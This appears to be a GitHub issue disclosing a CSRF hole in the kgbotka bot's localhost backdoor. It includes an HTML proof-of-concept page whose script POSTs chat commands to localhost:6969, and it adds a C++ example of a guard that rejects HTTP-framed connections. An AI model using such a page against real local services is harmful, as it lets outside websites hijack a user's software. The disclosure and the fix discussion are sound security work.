kgbotka

Backdoor is vulnerable to CSRF attacks

Open rexim opened this issue 5 years ago • 1 comments

  • Start the bot
  • On the same machine open a browser and go to http://localhost:6969/
  • Observe the HTTP query from the browser in the kgbotka.log

Jun 18 '20 19:06 rexim

Exploit:

<!DOCTYPE html>
<html>
  <head>
    <title>Not an Exploit Kapp</title>
  </head>
  <body>
    <h1>Ya got CSRF-ed bruh LOOOOL</h1>
    <script>
      const form = new FormData();
      form.append('cd', 'cd #tsoding');
      form.append('say', 'say you got CSRF-ed :)');
      fetch("http://localhost:6969/", {
        method: 'POST',
        body: form
      });
    </script>
  </body>
</html>

UPD Does not work after #230

Jun 19 '20 18:06 rexim
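Why the form fields in the page above reach a text command port, and one way to refuse such a connection, as an added C++ example that is not kgbotka's code and does not describe what #230 changed. It assumes the backdoor reads newline-terminated text commands; `is_command`, `accept_naive`, `accept_guarded` and both sample streams are hypothetical and constructed. `multipart/form-data` places each field value on a line of its own, so a parser that scans every line of the connection sees `cd #tsoding` and `say ...` as commands unless it rejects HTTP framing first.

```cpp
#include <iostream>
#include <sstream>
#include <string>
#include <vector>
// Hypothetical command set of a line-based control port (assumed, not kgbotka's).
static bool is_command(const std::string &l) {
    return l.rfind("cd ", 0) == 0 || l.rfind("say ", 0) == 0;
}
// True for "METHOD SP target SP HTTP/x.y", the first line a browser sends.
static bool is_http_request_line(const std::string &l) {
    std::istringstream in(l);
    std::string method, target, version, extra;
    if (!(in >> method >> target >> version) || (in >> extra)) return false;
    for (char c : method) if (c < 'A' || c > 'Z') return false;
    return version.rfind("HTTP/", 0) == 0;
}
// Split a raw byte stream into lines, tolerating both LF and CRLF endings.
static std::vector<std::string> split_lines(const std::string &stream) {
    std::vector<std::string> lines;
    std::istringstream in(stream);
    for (std::string l; std::getline(in, l); lines.push_back(l))
        if (!l.empty() && l.back() == '\r') l.pop_back();
    return lines;
}
// Unguarded: any line in the stream that parses as a command is accepted.
std::vector<std::string> accept_naive(const std::string &stream) {
    std::vector<std::string> out;
    for (const auto &l : split_lines(stream)) if (is_command(l)) out.push_back(l);
    return out;
}
// Guarded: a connection that opens with an HTTP request line is dropped whole.
std::vector<std::string> accept_guarded(const std::string &stream) {
    auto lines = split_lines(stream);
    if (!lines.empty() && is_http_request_line(lines.front())) return {};
    return accept_naive(stream);
}
// Constructed sample: what a browser puts on the wire for the FormData POST.
const std::string BROWSER_POST =
    "POST / HTTP/1.1\r\nHost: localhost:6969\r\n"
    "Content-Type: multipart/form-data; boundary=----x\r\n\r\n"
    "------x\r\nContent-Disposition: form-data; name=\"cd\"\r\n\r\n"
    "cd #tsoding\r\n"
    "------x\r\nContent-Disposition: form-data; name=\"say\"\r\n\r\n"
    "say you got CSRF-ed :)\r\n------x--\r\n";
const std::string OPERATOR_SESSION = "cd #tsoding\nsay hello\n";  // constructed
int main() {
    std::cout << "naive, browser POST: " << accept_naive(BROWSER_POST).size() << "\n"
              << "guarded, browser POST: " << accept_guarded(BROWSER_POST).size() << "\n"
              << "guarded, operator: " << accept_guarded(OPERATOR_SESSION).size() << "\n";
}
```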